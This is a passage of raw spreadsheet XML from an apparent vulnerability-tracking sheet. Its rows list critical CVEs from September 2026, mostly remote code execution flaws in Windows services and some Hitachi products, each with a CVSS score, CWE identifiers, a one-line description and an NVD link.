/><c r="R33" s="5" t="inlineStr"><is><t>CWE-122, CWE-125</t></is></c><c r="S33" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Event Logging Service allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T33" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69493</t></is></c></row><row r="34"><c r="A34" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B34" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C34" s="5" t="inlineStr"><is><t>CVE-2026-69496</t></is></c><c r="D34" s="5" t="n"><v>9.800000000000001</v></c><c r="E34" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F34" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G34" s="5" t="inlineStr" /><c r="H34" s="5" t="n"><v>0.01</v></c><c r="I34" s="5" t="inlineStr" /><c r="J34" s="5" t="inlineStr" /><c r="K34" s="5" t="inlineStr" /><c r="L34" s="5" t="inlineStr" /><c r="M34" s="5" t="inlineStr" /><c r="N34" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O34" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P34" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q34" s="5" t="inlineStr" /><c r="R34" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S34" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Compressed Folder allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T34" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69496</t></is></c></row><row r="35"><c r="A35" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B35" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C35" s="5" t="inlineStr"><is><t>CVE-2026-69525</t></is></c><c r="D35" s="5" t="n"><v>9.800000000000001</v></c><c r="E35" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F35" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G35" s="5" t="inlineStr" /><c r="H35" s="5" t="n"><v>0.01</v></c><c r="I35" s="5" t="inlineStr" /><c r="J35" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K3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5" s="5" t="inlineStr" /><c r="M35" s="5" t="inlineStr" /><c r="N35" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O35" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P35" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q35" s="5" t="inlineStr" /><c r="R35" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S35" s="5" t="inlineStr"><is><t>Use after free in Windows Remote Desktop Services allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T35" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69525</t></is></c></row><row r="36"><c r="A36" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B36" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C36" s="5" t="inlineStr"><is><t>CVE-2026-69579</t></is></c><c r="D36" s="5" t="n"><v>9.800000000000001</v></c><c r="E36" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F36" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G36" s="5" t="inlineStr" /><c r="H36" s="5" t="n"><v>0.01</v></c><c r="I36" s="5" t="inlineStr" /><c r="J36" s="5" t="inlineStr" /><c r="K36" s="5" t="inlineStr" /><c r="L36" s="5" t="inlineStr" /><c r="M36" s="5" t="inlineStr" /><c r="N36" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O36" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P36" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q36" s="5" t="inlineStr" /><c r="R36" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S36" s="5" t="inlineStr"><is><t>Use after free in Windows Message Queuing allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T36" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69579</t></is></c></row><row r="37"><c r="A37" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B37" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C37" s="5" t="inlineStr"><is><t>CVE-2026-69586</t></is></c><c r="D37" s="5" t="n"><v>9.800000000000001</v></c><c r="E37" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F37" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G37" s="5" t="inlineStr" /><c r="H37" s="5" t="n"><v>0.01</v></c><c r="I37" s="5" t="inlineStr" /><c r="J37" s="5" t="inlineStr" /><c r="K37" s="5" t="inlineStr" /><c r="L37" s="5" t="inlineStr" /><c r="M37" s="5" t="inlineStr" /><c r="N37" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O37" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P37" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q37" s="5" t="inlineStr" /><c r="R37" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="S37" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Microsoft Windows PDF allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T37" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69586</t></is></c></row><row r="38"><c r="A38" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B38" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C38" s="5" t="inlineStr"><is><t>CVE-2026-69590</t></is></c><c r="D38" s="5" t="n"><v>9.800000000000001</v></c><c r="E38" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F38" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G38" s="5" t="inlineStr" /><c r="H38" s="5" t="n"><v>0.01</v></c><c r="I38" s="5" t="inlineStr" /><c r="J38" s="5" t="inlineStr" /><c r="K38" s="5" t="inlineStr" /><c r="L38" s="5" t="inlineStr" /><c r="M38" s="5" t="inlineStr" /><c r="N38" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O38" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P38" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q38" s="5" t="inlineStr" /><c r="R38" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S38" s="5" t="inlineStr"><is><t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t></is></c><c r="T38" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69590</t></is></c></row><row r="39"><c r="A39" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B39" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C39" s="5" t="inlineStr"><is><t>CVE-2026-69595</t></is></c><c r="D39" s="5" t="n"><v>9.800000000000001</v></c><c r="E39" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F39" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G39" s="5" t="inlineStr" /><c r="H39" s="5" t="n"><v>0.011</v></c><c r="I39" s="5" t="inlineStr" /><c r="J39" s="5" t="inlineStr" /><c r="K39" s="5" t="inlineStr" /><c r="L39" s="5" t="inlineStr" /><c r="M39" s="5" t="inlineStr" /><c r="N39" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O39" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P39" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q39" s="5" t="inlineStr" /><c r="R39" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S39" s="5" t="inlineStr"><is><t>Use after free in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T39" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69595</t></is></c></row><row r="40"><c r="A40" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B40" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C40" s="5" t="inlineStr"><is><t>CVE-2026-69715</t></is></c><c r="D40" s="5" t="n"><v>9.800000000000001</v></c><c r="E40" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F40" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G40" s="5" t="inlineStr" /><c r="H40" s="5" t="n"><v>0.01</v></c><c r="I40" s="5" t="inlineStr" /><c r="J40" s="5" t="inlineStr" /><c r="K40" s="5" t="inlineStr" /><c r="L40" s="5" t="inlineStr" /><c r="M40" s="5" t="inlineStr" /><c r="N40" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O40" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P40" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q40" s="5" t="inlineStr" /><c r="R40" s="5" t="inlineStr"><is><t>CWE-122, CWE-125</t></is></c><c r="S40" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Direct Show allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T40" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69715</t></is></c></row><row r="41"><c r="A41" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B41" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C41" s="5" t="inlineStr"><is><t>CVE-2026-69730</t></is></c><c r="D41" s="5" t="n"><v>9.800000000000001</v></c><c r="E41" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F41" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G41" s="5" t="inlineStr" /><c r="H41" s="5" t="n"><v>0.011</v></c><c r="I41" s="5" t="inlineStr" /><c r="J41" s="5" t="inlineStr" /><c r="K41" s="5" t="inlineStr" /><c r="L41" s="5" t="inlineStr" /><c r="M41" s="5" t="inlineStr" /><c r="N41" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O41" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P41" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q41" s="5" t="inlineStr" /><c r="R41" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S41" s="5" t="inlineStr"><is><t>Use after free in Windows DNS allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T41" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69730</t></is></c></row><row r="42"><c r="A42" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B42" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C42" s="5" t="inlineStr"><is><t>CVE-2026-69768</t></is></c><c r="D42" s="5" t="n"><v>9.800000000000001</v></c><c r="E42" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F42" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G42" s="5" t="inlineStr" /><c r="H42" s="5" t="n"><v>0.008999999999999999</v></c><c r="I42" s="5" t="inlineStr" /><c r="J42" s="5" t="inlineStr" /><c r="K42" s="5" t="inlineStr" /><c r="L42" s="5" t="inlineStr" /><c r="M42" s="5" t="inlineStr" /><c r="N42" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O42" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P42" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q42" s="5" t="inlineStr" /><c r="R42" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S42" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows RNDIS allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T42" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69768</t></is></c></row><row r="43"><c r="A43" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B43" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C43" s="5" t="inlineStr"><is><t>CVE-2026-69769</t></is></c><c r="D43" s="5" t="n"><v>9.800000000000001</v></c><c r="E43" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F43" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G43" s="5" t="inlineStr" /><c r="H43" s="5" t="n"><v>0.008999999999999999</v></c><c r="I43" s="5" t="inlineStr" /><c r="J43" s="5" t="inlineStr" /><c r="K43" s="5" t="inlineStr" /><c r="L43" s="5" t="inlineStr" /><c r="M43" s="5" t="inlineStr" /><c r="N43" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O43" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P43" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q43" s="5" t="inlineStr" /><c r="R43" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S43" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T43" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69769</t></is></c></row><row r="44"><c r="A44" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B44" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C44" s="5" t="inlineStr"><is><t>CVE-2026-69819</t></is></c><c r="D44" s="5" t="n"><v>9.800000000000001</v></c><c r="E44" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F44" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G44" s="5" t="inlineStr" /><c r="H44" s="5" t="n"><v>0.008999999999999999</v></c><c r="I44" s="5" t="inlineStr" /><c r="J44" s="5" t="inlineStr" /><c r="K44" s="5" t="inlineStr" /><c r="L44" s="5" t="inlineStr" /><c r="M44" s="5" t="inlineStr" /><c r="N44" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O44" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P44" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q44" s="5" t="inlineStr" /><c r="R44" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S44" s="5" t="inlineStr"><is><t>Out-of-bounds write in RPC Runtime allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T44" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69819</t></is></c></row><row r="45"><c r="A45" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B45" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C45" s="5" t="inlineStr"><is><t>CVE-2026-69824</t></is></c><c r="D45" s="5" t="n"><v>9.800000000000001</v></c><c r="E45" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F45" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G45" s="5" t="inlineStr" /><c r="H45" s="5" t="n"><v>0.01</v></c><c r="I45" s="5" t="inlineStr" /><c r="J45" s="5" t="inlineStr" /><c r="K45" s="5" t="inlineStr" /><c r="L45" s="5" t="inlineStr" /><c r="M45" s="5" t="inlineStr" /><c r="N45" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O45" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P45" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q45" s="5" t="inlineStr" /><c r="R45" s="5" t="inlineStr"><is><t>CWE-122, CWE-191</t></is></c><c r="S45" s="5" t="inlineStr"><is><t>Integer underflow (wrap or wraparound) in Microsoft Standard XPS allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T45" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69824</t></is></c></row><row r="46"><c r="A46" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B46" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C46" s="5" t="inlineStr"><is><t>CVE-2026-69829</t></is></c><c r="D46" s="5" t="n"><v>9.800000000000001</v></c><c r="E46" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F46" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G46" s="5" t="inlineStr" /><c r="H46" s="5" t="n"><v>0.011</v></c><c r="I46" s="5" t="inlineStr" /><c r="J46" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K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6" s="5" t="inlineStr" /><c r="M46" s="5" t="inlineStr" /><c r="N46" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O46" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P46" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q46" s="5" t="inlineStr" /><c r="R46" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S46" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Shell allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T46" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69829</t></is></c></row><row r="47"><c r="A47" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B47" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C47" s="5" t="inlineStr"><is><t>CVE-2026-69845</t></is></c><c r="D47" s="5" t="n"><v>9.800000000000001</v></c><c r="E47" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F47" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G47" s="5" t="inlineStr" /><c r="H47" s="5" t="n"><v>0.008999999999999999</v></c><c r="I47" s="5" t="inlineStr" /><c r="J47" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K47" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L47" s="5" t="inlineStr" /><c r="M47" s="5" t="inlineStr" /><c r="N47" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O47" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P47" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q47" s="5" t="inlineStr" /><c r="R47" s="5" t="inlineStr"><is><t>CWE-122, CWE-20</t></is></c><c r="S47" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T47" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69845</t></is></c></row><row r="48"><c r="A48" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B48" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C48" s="5" t="inlineStr"><is><t>CVE-2026-69910</t></is></c><c r="D48" s="5" t="n"><v>9.800000000000001</v></c><c r="E48" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F48" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G48" s="5" t="inlineStr" /><c r="H48" s="5" t="n"><v>0.01</v></c><c r="I48" s="5" t="inlineStr" /><c r="J48" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K4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8" s="5" t="inlineStr" /><c r="M48" s="5" t="inlineStr" /><c r="N48" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O48" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P48" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q48" s="5" t="inlineStr" /><c r="R48" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S48" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows Hyper-V allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T48" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69910</t></is></c></row><row r="49"><c r="A49" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B49" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C49" s="5" t="inlineStr"><is><t>CVE-2026-70296</t></is></c><c r="D49" s="5" t="n"><v>9.800000000000001</v></c><c r="E49" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F49" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G49" s="5" t="inlineStr" /><c r="H49" s="5" t="n"><v>0.01</v></c><c r="I49" s="5" t="inlineStr" /><c r="J49" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K4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 s="5" t="inlineStr" /><c r="M49" s="5" t="inlineStr" /><c r="N49" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O49" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P49" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q49" s="5" t="inlineStr" /><c r="R49" s="5" t="inlineStr"><is><t>CWE-787</t></is></c><c r="S49" s="5" t="inlineStr"><is><t>Out-of-bounds write in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T49" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70296</t></is></c></row><row r="50"><c r="A50" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B50" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C50" s="5" t="inlineStr"><is><t>CVE-2026-71374</t></is></c><c r="D50" s="5" t="n"><v>9.800000000000001</v></c><c r="E50" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F50" s="5" t="inlineStr"><is><t>hirt@hitachi.co.jp</t></is></c><c r="G50" s="5" t="inlineStr" /><c r="H50" s="5" t="n"><v>0.003</v></c><c r="I50" s="5" t="inlineStr" /><c r="J50" s="5" t="inlineStr" /><c r="K50" s="5" t="inlineStr" /><c r="L50" s="5" t="inlineStr" /><c r="M50" s="5" t="inlineStr" /><c r="N50" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O50" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P50" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q50" s="5" t="inlineStr" /><c r="R50" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="S50" s="5" t="inlineStr"><is><t>Deserialization of untrusted data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is></c><c r="T50" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71374</t></is></c></row><row r="51"><c r="A51" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B51" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C51" s="5" t="inlineStr"><is><t>CVE-2026-71376</t></is></c><c r="D51" s="5" t="n"><v>9.800000000000001</v></c><c r="E51" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F51" s="5" t="inlineStr"><is><t>hirt@hitachi.co.jp</t></is></c><c r="G51" s="5" t="inlineStr" /><c r="H51" s="5" t="n"><v>0.01</v></c><c r="I51" s="5" t="inlineStr" /><c r="J51" s="5" t="inlineStr" /><c r="K51" s="5" t="inlineStr" /><c r="L51" s="5" t="inlineStr" /><c r="M51" s="5" t="inlineStr" /><c r="N51" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O51" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P51" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q51" s="5" t="inlineStr" /><c r="R51" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="S51" s="5" t="inlineStr"><is><t>OS command injection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is></c><c r="T51" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71376</t></is></c></row><row r="52"><c r="A52" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B52" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C52" s="5" t="inlineStr"><is><t>CVE-2026-71377</t></is></c><c r="D52" s="5" t="n"><v>9.800000000000001</v></c><c r="E52" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F52" s="5" t="inlineStr"><is><t>hirt@hitachi.co.jp</t></is></c><c r="G52" s="5" t="inlineStr" /><c r="H52" s="5" t="n"><v>0.003</v></c><c r="I52" s="5" t="inlineStr" /><c r="J52" s="5" t="inlineStr" /><c r="K52" s="5" t="inlineStr" /><c r="L52" s="5" t="inlineStr" /><c r="M52" s="5" t="inlineStr" /><c r="N52" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O52" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P52" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q52" s="5" t="inlineStr" /><c r="R52" s="5" t="inlineStr"><is><t>CWE-88</t></is></c><c r="S52" s="5" t="inlineStr"><is><t>Command Argument Injection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through 11-00-12, from 09-87 before 09-87-10, from 09-80 through 09-80-04, from 09-70 before 09-70-28, from 09-50 through 09-50-22, and from 09-00 through 09-00-18.</t></is></c><c r="T52" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71377</t></is></c></row><row r="53"><c r="A53" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B53" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C53" s="5" t="inlineStr"><is><t>CVE-2026-72979</t></is></c><c r="D53" s="5" t="n"><v>9.800000000000001</v></c><c r="E53" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F53" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G53" s="5" t="inlineStr" /><c r="H53" s="5" t="n"><v>0.01</v></c><c r="I53" s="5" t="inlineStr" /><c r="J53" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K53" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L53" s="5" t="inlineStr" /><c r="M53" s="5" t="inlineStr" /><c r="N53" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O53" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P53" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q53" s="5" t="inlineStr" /><c r="R53" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S53" s="5" t="inlineStr"><is><t>Use after free in Windows DHCP Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T53" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72979</t></is></c></row><row r="54"><c r="A54" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B54" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C54" s="5" t="inlineStr"><is><t>CVE-2026-72982</t></is></c><c r="D54" s="5" t="n"><v>9.800000000000001</v></c><c r="E54" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F54" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G54" s="5" t="inlineStr" /><c r="H54" s="5" t="n"><v>0.008999999999999999</v></c><c r="I54" s="5" t="inlineStr" /><c r="J54" s="5" t="inlineStr" /><c r="K54" s="5" t="inlineStr" /><c r="L54" s="5" t="inlineStr" /><c r="M54" s="5" t="inlineStr" /><c r="N54" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O54" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P54" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q54" s="5" t="inlineStr" /><c r="R54" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="S54" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows Netlogon allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T54" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72982</t></is></c></row><row r="55"><c r="A55" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B55" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C55" s="5" t="inlineStr"><is><t>CVE-2026-72983</t></is></c><c r="D55" s="5" t="n"><v>9.800000000000001</v></c><c r="E55" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F55" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G55" s="5" t="inlineStr" /><c r="H55" s="5" t="n"><v>0.008999999999999999</v></c><c r="I55" s="5" t="inlineStr" /><c r="J55" s="5" t="inlineStr" /><c r="K55" s="5" t="inlineStr" /><c r="L55" s="5" t="inlineStr" /><c r="M55" s="5" t="inlineStr" /><c r="N55" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O55" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P55" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q55" s="5" t="inlineStr" /><c r="R55" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S55" s="5" t="inlineStr"><is><t>Use after free in Windows Internet Connection Sharing (ICS) allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T55" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72983</t></is></c></row><row r="56"><c r="A56" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B56" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C56" s="5" t="inlineStr"><is><t>CVE-2026-73009</t></is></c><c r="D56" s="5" t="n"><v>9.800000000000001</v></c><c r="E56" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F56" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G56" s="5" t="inlineStr" /><c r="H56" s="5" t="n"><v>0.008999999999999999</v></c><c 